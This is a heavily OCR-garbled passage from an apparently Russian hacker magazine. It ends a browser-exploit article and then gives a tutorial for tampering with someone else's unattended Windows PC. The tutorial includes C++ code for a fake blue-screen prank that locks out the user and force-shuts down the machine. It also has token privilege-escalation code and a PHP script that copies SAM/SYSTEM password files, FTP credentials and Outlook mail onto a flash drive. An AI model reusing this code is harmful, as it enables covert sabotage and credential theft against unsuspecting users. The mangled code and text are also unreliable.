вон какоказалось.Теперья не верю ни браузерам, ниженщинам и, прежде 
чем вновь начать серфить Рысем не внушающие доверия сайты, тщательно 
изучаю его исходный код — вдругтам какой баг, о котором еще никто не 
знает? То есть это я не знаю, этот, кому нужно, знает о багах все. 

Воти думай, какие стать параноиком притаком положении дел! Но всеже 
вероятность попасть под атаку, сидя на Рысе, настолько близка к абсолют- 
ному нулю, что совершенно несущественна и ей можно на 99% пренебречь, 
но потенциально небезопасные сайты все-таки лучше просматривать из- 
под виртуальной машины. Мало ли... 



Эксплойты для Горящего Лиса 



Эксплойты для Оперы 

В ЗАКЛЮЧЕНИЕ 

Все мы небезгрешны. И браузеры в том числе. Дыры — явление стихий- 
ное и неизбежное. Против стихии не попрешь. Самое лучше, что можно 
только сделать, — это прекратить верить и начать активно действовать. 
Следить за новостями безопасности, оперативно скачивать и устанав- 
ливать обновления/свежие версии/заплатки. Использовать много- 
уровневые системы защиты: брандмауэры, антивирусы... Ну и, наконец, 
не щелкать по подозрительным ссылкам. Кстати, существует мнение, 
что опаснее всего блуждать по порносайтам, но это мнение глубоко 
ошибочно. На нормальных порносайтах с нормальными доменами (а не 
на отстойниках типа ххххх.пагосі.ги) зловредного контента практически 
не встречается :). 

И еще — в последнее время Ѳоодіе обзавелся антивирусом, распознающим 
некоторые типы вредоносного контента и выдающим соответствующее 
предупреждения под ссылками на страницы, которые пытаются атаковать 
браузер. Так что перед открытием подозрительной ссылки, полученной 
из ненадежных источников, имеет смысл сначала отыскать ее в Ооодіе и 
посмотреть, что он скажет. ИНИ 
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ІЕОНИД «ВОЮ» СТРОЙКОВІ 



ІВЛАДИМИР «РОТ.ЕВВ» САВИЦКИЙ| 



о 



ИННА О 



ИН 



ІЯШІМіІй 

ІКак часто ты общаешься со своими друзьями/коллегами/знакомыми? Нет, речь идет не 
|о виртуальном общении, а о контакте в реале. Каждый день мы пересекаемся со множес- 



твом людей в самых разных ситуациях, причем комп играет при этом далеко не послед-1 
Інююроль. К чему я клоню? Все просто. Где бы ты ни был: в гостях, на работе, в офисе, 



р начальника в кабинете — везде можно заметить небрежно торчащий из-под стола | 



(системник. Думаю, ты не раз попадал в ситуации, когда тебя оставляли одного в чужом 



(помещении рядом со включенным компом. А ведь делать это категорически нельзя. 
(Почему? Устраивайся поудобнее, сейчас мы подробно расскажем тебе о том, что можно | 
^натворить с чужим компом всего за несколько секунд 



Щ МУТИМ ЗАПАДЛО 

Итак, мы оказались за чужим компом всего на несколько минут. Что можно 
I сделать за это время? В принципе, все что угодно, но все должно быть 



тіпсіисіе "ѵ/іпсіоюз . Ь" 
#іпс1исІе "соштсСгІ .Ь" 



заранее подготовлено. Да, отформатировать винт можно одной командой 
в консоли, но скучнее шутки не придумаешь. Мы попробуем сымитировать 
всем знакомый В5СЮ (Віие Зсгееп оТ 0еа1;Ы. Синий экран смерти можно 
наблюдать в тех случаях, когда возникает ошибка в коде ядра или драйвера, 
выполняющегося в режиме ядра, либо вызвать его вручную. В отличие от 
оригинального, во время показа нашего В5СЮ Винда будет продолжать 
свою работу, выполняя нужные нам задачи, а после перезагрузки от него не 
останется и следа. 

Напишем небольшую программку на С++, использующую ѴѴіп32АРІ. Для фей- 
кового экрана нам необходимо полностью очистить рабочий стол, поместить 
на него изображение оригинального В5СЮ и убрать мышь. Также для примера 
обработаем нажатие клавиш <АІІ-ТаЬ> и вызов диспетчера задач. 

Начнем сявного определения версии Винды и подключения необходи- 
мых заголовочных (Ьеасіег) файлов. Предположительно, работать будем с 
Виндой ЫТ 5.0 (ХР): 

#(3еіііпе ДОІЫѴЕК 0x0500 



Дальше работаем втеле программы. Необходимо скрыть панельзадач, 
которая является одним из окон. Для этого получим НѴѴЫО (уникаль- 
ный идентификатор окна в ѴѴіпсІоѵѵз] панели задач при помощи функ- 
ции Ріпб\Л/іпбо\М"5ЬеІІ_Тгау\Л/пб",Миі_І_] и используем его в функции 
ЗЬоѵѵѴѴіпсІоѵѵП, позволяющей задавать режим отображения окна. В нашем 
случае необходимо скрыть окно, поэтому второй параметр выставляем в 
5ѴѴ_НЮЕ: 

ЗЪомМпсІоѵ? ( 

РіпсЗМіпсІсж ( " 5Ье11_Тгау№ісГ' ,ЫІІЬЬ) , 

ЗМ_НІБЕ 

) ; 

Следующим шагом уберем ярлыки (папки и прочее), в большом количестве 
расплодившиеся на рабочем столе. Рабочий стол также является одним из 
окон ѴѴіпсІоѵѵз с названием РгодМап (ака ргодгат тападег), а все, что на нем 
находится, — его элементами. Получим НѴѴЫ0 рабочего стола; через обраще- 
ние кдочерним окнам функцией СеіАЛ/іпсІоѵѵО с параметром 6ѴѴ_СНІІ_0 добе- 
ремся до окна, содержащего ярлыки, и пошлем ему сообщение об удалении 



Заголовочные файлы с необходимыми АРІ-функциями: 

► 064 
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Вносим изменения в реестр 
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эрутим хэши паролей из 5АМ-файла 



(с экрана, физически элементы не удаляются) всех элементов 
через БепсІМеззадеО с параметром І_ѴМ_0ЕІ_ЕТЕАШТЕМ5. 

НШГО БезкЕорНапсІІе = РіпсМіпсІсш ( " РгодМап" , 0) ; 

БезкЕорНапсПе = СеЕМіпсІом (БезкЕорНапсІІе, 
СМ_СНІЬБ) ; 

БезкЕорНапсПе = СеЕМіпсІои (БезкЕорНапсІІе , 
СМ_СНІЬБ) ; 

ЗепсІМеззаде (БезкЕорНапсПе , 

ЬѴМ_БЕЬЕТЕАЬЫТЕМЗ , 0 , 0 ) ; 

На десктопе все еще висят открытые окна и приложения. Свер- 
нем их вуже скрытую панель задач нажатием <ѴѴіп-М>. Нажатие 
клавиши в привычном нам смысле реализуется непосредствен- 
но ее нажатием и отжатием. Передадим в функцию кеуЬсІ_еѵепШ 
первым параметром необходимую клавишу, а третьим — ее 
состояние: 0 — нажата, КЕУЕ\ЛЕЫТР_КЕУ11Р — отжата. Также 
необходимо поместить небольшую задержку в 1 00 миллисекунд. 

Зіеер (100) ; 

кеуЪс!_еѵепЕ (ѴК_ШШ, 0, 0 ,0); 

кеуЬс!_еѵепЕ ( ' М ' , 0 , 0 , 0 ) ; 

кеуЬсІ_еѵепЕ ( ' М ' , 0 , КЕУЕѴЕЫТР_КЕУБР , 0 ) ; 

кеуЪсІ_еѵепЕ (ѴК_ШШ, 0 , КЕУЕУЕЫТР_КЕУБР , 0 ) ; 

Зіеер (100) ; 

Теперь на десктопе мы можем наблюдать толь ко обои и мышь. 
Ими и займемся. Положим изображение синего экрана смерти 
в виде файла ВЗСЮ.Ьтр в каталоге прогой. АРІ-функция 
БузІетРагатеІегзІпІюО может отображать и изменять различ- 
ные параметры системы. В нашем случае первым параметром 
функции будет 5РІ_5ЕТ0Е5КѴ\/АЕЕРАРЕР, отвечающий за 
обои на рабочем столе.третьим — имя файла с изображением 
В5СЮ, а четвертым - 5Р1Е_5ЕЫ0\А/1М1М1СНАМ6Е, указываю- 
щий на то, что необходимо обновить конфиг: 

скаг Еііепаше [50] ; 

зЕгсру ( Еііепате , "ВЗОБ.Ьтр") ; 

ЗузЕетРагатеЕегзІпЕо (ЗРІ_5ЕТБЕЗКМАБЬРАРЕК, 

0 , & Ті1епаше , ЗРІЕ_ЗЕЫБМІШШСНАШЕ) ; 

Синий экран с белым текстом радует глаз, но курсор мыши пор- 
тит все впечатление. Скроем и уберем курсор в правый ниж- 
ний угол. Воспользовавшись функцией ОеіБузІегпМеІтісзО 
с параметром 5М_СХ5СРЕЕЫ, получим разрешение экрана 
по горизонтали, с параметром 5М_СУ5СВЕЕЫ — по верти- 
кали. Внесем полученные значения в структурутипа РОІЫТ, 
необходимую для функции установки курсора в определенную 
позицию БеіСигзогРозО. 



іпЕ зсгеепМ=0еЕЗузЕетМеЕгісз (ЗМ_СХЗСКЕЕЫ) ; 

іпЕ зсгеепН=0еЕЗузЕетМеЕгісз (ЗМ_СУЗСКЕЕЫ) ; 

РОІЫТ рЦ = (зсгеепМ, зсгеепН}; 

Скрывать и устанавливать мышь в угол экрана будем в бес- 
конечном цикле, чтобы не дать юзверю испортить иллюзию 
отсутствия курсора: 

ѵгііііе (1) { 

ЗЬстСигзог ( 0 ) ; 

ЗеЕСигзогРоз (рЕ .х, рЕ.у); 

} 

С виду все в порядке, но пользователь может подумать, что его 
разыгрывают, и попытаться запустить диспетчер задач или 
попробоватьсменитьпрограммупо <АІІ-ТаЬ>. Конечно, можно 
написать хук (ловушку) на клавиатуру, но мы ограничимся 
следующим. При нажатии <АП;-ТаЬ> в Винду посылается сигнал 
нажатия и отжатия этих клавиш. Мы же будем непрерывно посы- 
лать сигнал о том, что клавиши <АИ> и <ТаЬ> отжаты, тем самым 
не допуская использование этой комбинации. Добавим в цикл, 
описанный чуть выше, строчки: 

кеуЪсІ_еѵепЕ ( ѴК_ТАВ , 0 , КЕУЕѴЕЫТЕ_КЕУБР , 0 ) ; 

кеуЬ<І_еѵепЕ ( ѴК_МЕШ , 0 , КЕУЕѴЕЫТЕ_КЕУБР , 0 ) ; 

Следующий на очереди — диспетчер задач. При его вызове, 
к примеру, будем выключать компьютер. Ловить появле- 
ние диспетчера мы станем непрерывным поиском окна 
«Диспетчер задач ѴѴіпсІоѵѵз» (предположительно, мы имеем 
обычного юзера, использующего локализованную Винду) 
через РіпсІѴѴіпс]о\л/(). При появлении ему будет отсылаться 
сообщение о закрытии функцией РозМеззадеО. Далее 
выключаем компьютер, используя ЕхіЛА/іпсІоѵѵзЕхП с первым 
параметром ЕѴѴХ_Р0ѴѴЕП0РР для форсированного выклю- 
чения (можно ЕѴѴХ_ПЕ5ТАРТ для перезагрузки). Добавим 
во все тотже цикл кфункциям работы с мышью и клавой 
следующий код: 

1 (ЕіпсіМпсіоѵ 7(ШЬБ, "Диспетчер задач 

Міпсісжз " ) ) { 

РозЕМеззаде (ЕіпсіМпсіоѵДШЬЬ, 

"Диспетчер задач Міпсісшз") , Ш_ОІЛТ, 0, 0) ; 

ЕхіШішіомзЕх ( ЕМХ_Р(ЖЕКОЕЕ , 0 ) ; 

} 

Функция ЕхііѴѴіпсіоѵѵзЕхО не будет работать без соответствую- 
щих привилегий (прав доступа), получить которые можнотак 
(код добавляется перед описанным выше циклом ѵѵЫІе): 










> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с це- 
лью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несут! 







> ІП^О 

Скопируй себе на 
флешку РНР-интер- 
претатор, утилу Ьосаі 
Тооіз (Ьазе.рНр+ВБСЮ. 
ехе) и картинку ВБСЮ. 
Ьтр. В корне флеш- 
диска обязательно 
создай каталогітр. 

Помни, что от размера 
файла Оииоок.рз* 
напрямую зависит 
скорость работы утилы 
ДосаІТооІз. 




осіѵсі 

Все утилиты мы 
заботливо выложили 
на йѴО для твоей 
оценки. 
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взлом 




Все, что нужно иметь на флешке :) 

НАИВЬЕ ЪТокеп; 

ТОКЕЫ_РКІѴІЬЕСЕЗ ккр; 

ОрепРгосеззТокеп (СекСшггепкРгосезз ( ) , 
ТОКЕЫ_АВЛІЗТ_РКІѴІЬЕСЕЗ | ТОКЕЫ_<21ІЕКУ , &ЬТокеп) ; 
ЬоокирРгіѵіІедеѴаІие (ШЬЬ , ЗЕ_ЗГОТБОШ_ЫАМЕ , 
&ккр.Ргіѵі1едез [0] .Ьиісі) ; 
ккр . РгіѵіІедеСоипк = 1; 

ккр . Ргіѵііедез [ 0 ] .АккгіЪикез = ЗЕ_РКІѴІЬЕСЕ_ЕКАВЬЕБ; 
АсізизкТокепРгіѵіІедез (ЬТокеп, ЕАЬЗЕ, &ккр, 0, 
(РТОКЕЫ_РКІѴІЬЕСЕЗ) ШЬЬ, 0); 

Готово. Сохраняем, компилируем, запускаем и получаем очередной инстру- 
ментпо западлостроению. 

Особенно интересным мне представляется использование этого способа 
следующим образом. 

1. Делаем скриншот: 

кеуЪсі_еѵепк (ѴК_ЗЫАРЗНОТ, 0, 0 ,0); 

кеуЪсі_еѵепк ( ѴК_ЗЫАРЗНОТ , 0 , КЕУЕѴЕЫТР_КЕУІТР , 0 ) ; 

2. Сохраняем в папкус программой (допустим, сохраним вручную взапу- 
щенном РаіпГе). 

МіпЕхес ( "тзраіпк . ехе" , ЗЭД_ЗН(Ж) ; 

В это время наша прога должна быть остановлена, поскольку нам пона- 
добится определенное время, чтобы сохранить скриншот. Пусть ожидает 
нажатия клавиши: 

дексЬ ( ) ; 

Заменяем изображение ВЗОй принтскрином рабочего стола юзера. 

3. Убираем из цикла ѵѵЫІеИ ) выключение компьютера, то есть строчку 
«Ехі1:ѴѴіпсіо\л/5Ех(ЕѴѴХ_Р0ѴѴЕВ0РР, 0);». 

4. Убираем функции для работы с мышью («ЗЬоѵѵСигзогШ); ЗеіСигзогРозІрГ 
х, рі.у) ;», в частности). В тело программы добавляем следующие строки: 

іпк М3=1 ; 

ЗузкетРагашекегзІпіо ( ЗРІ_ЗЕТМОиЗЕЗРЕЕБ , ШЬЬ , 

(ѵоісі* ) М3 , ЗРІЕ^РОАТЕІЫІЕІЬЕ) ; 

Так мы до минимума замедлим скорость перемещения курсора. 

5. Добавляем в цикл ѵѵЫІеИ ) функцию сокрытия ярлыков на рабочем столе 
и команду ожидания на 1 0 миллисекунд, чтобы разгрузить процессор и дать 
юзеру повозить мышью: 

ЗепсЗМеззаде (БезккорНапсІІе , ЬѴМ_БЕЬЕТЕАЬЫТЕМЗ , 0, 0) ; 
Зіеер (10) ; 

Какты уже догадался, пользовательувидитсвою любимую Винду, но, щелкая по 
ярлыкам, папкам, «Пуску» и программам на панели задач, придет в недоумение. 

^ ВЫВОРАЧИВАЕМ КАРМАНЫ 

Все, с западлостроением разобрались. Нашей следующей задачей будет 
«заимствование» полезной информации с чужого компа :]. Какты уже 




догадался, «заимствовать» инфу удобнее всего с помощью самописной 
тулзы, которую мы обязательно напишем, только чуть позже. Для начала 
давай определимся с тем, что нас может интересовать в стандартной Вин- 
де: 5АМ-файл, конфиги с аккаунтами от различных приложений. 

Что касается первого, то кроме самой резервной копии 5АМ-файла нам 
понадобится еще и бэкап файла 5У5ТЕМ. И тот и другой хранятся, как 
известно, здесь: 

С: \ЭДШБОМЗ\гераіг\ 

Брутить пассы виндовых юзеров из ЗАМ’а удобнее всего утилой БОР, кото- 
рую ты без труда найдешь на просторах секлаба. 

Со вторым пунктом все немного сложнее. Дело в том, что нам нужно 
знать точное место расположения конфигов. Конечно, можно реа- 
лизовать парсинг содержимого всего винта, но сколько потребуется 
времени на обработку хотя бы 80 гигов... А о том, что будет с твоей 
задницей, если во время поиска в помещение неожиданно вернется 
хозяин, мне и думать не хочется :). Следовательно, работа нашей тул- 
зы должна укладываться в жесткие временные рамки. А значит, брать 
с чужого компа мы будем только то, что находится в заранее извес- 
тном каталоге. Прежде всего это конфиг Тсіаі. Соттапбег’а и файл 
данных из М5 ОіЛІоок’а. Первый лежит в С ДѴѴІ N 0 0ѴѴ5\ѵѵсх ГБр . і п і и 
содержит в себе все РТР-учетки пользователя, а второй располагает- 
ся в СДОоситепІз ап б 5еШпд5\имя_юзера\1_оса1 5еиіпд5\АррІісаІіоп 
ОаіаѴМісгозоМОииооіЛОииоок.рБІ: и бережно хранит переписку и 
контакты жертвы :]. 

Так как наша утила подлежит постоянным изменениям и доработке, кодить 
удобнее всего на каком-либо скриптовом языке, например на всеми люби- 
мом РНР: 

#Сливаем конфиг с ЕТР- аккаунтами из Токаі Соттапсіег'а 

$ікр = "С : \ѴШТООѴ75\отсх_:Екр. іпі " ; 

ІГ ( із_кі1е ( $ікр) ) { 

сору ( "С: \ШШОМЗ\\лгсх_і:кр. іпі" , 

" $РБ: \\кшр\исх_ікр . іпі " ) ; 

} еізе { 

есію ( "Магпіпд ! Рііе исх_іі:р . іпі : пок іоипсі ог 
ассезз сіепіесі. \п" ) ; 

} 

#Сливаем резервную копию ЗАМ-файла и файла ЗУЗТЕМ 

$заш = сору ( "С : \ШЫБ0МЗ\\гераіг\\зат" , " $РБ: \\ктр\зат») ; 

$зуз = сору ( "С : \ШЫБ0МЗ\\гераіг\\зузкет" , 

" $РБ: \\ктр\зузкет" ) ; 

іі ( ! $ зу з ) { 

сору ( "С : \ШШ0МЗ\\гераіг\\зузкет.Ъак" , 

" $РБ: \\ктр\зузкет" ) ; 

} 



► 066 
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